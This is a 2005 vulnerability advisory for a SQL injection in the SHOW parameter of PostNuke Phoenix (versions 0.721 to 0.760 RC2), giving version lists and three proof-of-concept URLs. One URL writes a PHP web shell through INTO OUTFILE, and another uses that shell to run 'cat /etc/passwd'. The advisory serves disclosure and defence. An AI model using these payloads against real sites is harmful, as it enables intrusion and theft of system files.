

Title:          PostNuke Phoenix SHOW Parameter Remote SQL Injection Vulnerability
Published:      2005-02-28-12:00AM
Updated:        2005-02-28-10:39PM
Class:          Input Validation Error
CVE:            CVE-MAP-NOMATCH
Remote:         Yes
Local:          No
Credit:         Discovery is credited to Maksymilian Arciemowicz <max@jestsuper.pl>.
Vulnerable:     PostNuke Development Team PostNuke Phoenix 0.760 RC2
                PostNuke Development Team PostNuke Phoenix 0.750
                PostNuke Development Team PostNuke Phoenix 0.726
                PostNuke Development Team PostNuke Phoenix 0.723
                PostNuke Development Team PostNuke Phoenix 0.722
                PostNuke Development Team PostNuke Phoenix 0.721
Not Vulnerable: PostNuke Development Team PostNuke Phoenix 0.760 RC3
Code:           An exploit is not required.

The following proof of concept examples are available:

http://www.example.com/index.php?name=Downloads&req=search&query=&show=cXIb8O3

http://www.example.com/index.php?name=Downloads&req=search&query=[Program name]&show=10%20INTO%20OUTFILE%20'/[PATH]/pnTemp/Xanthia_cache/cXIb8O3.php'/*

http://www.example.com/pnTemp/Xanthia_cache/cXIb8O3.php?cx=cat /etc/passwd



Copyright 2007, SecurityDot
Thu, 17 Dec 2009 01:02:48 +0000
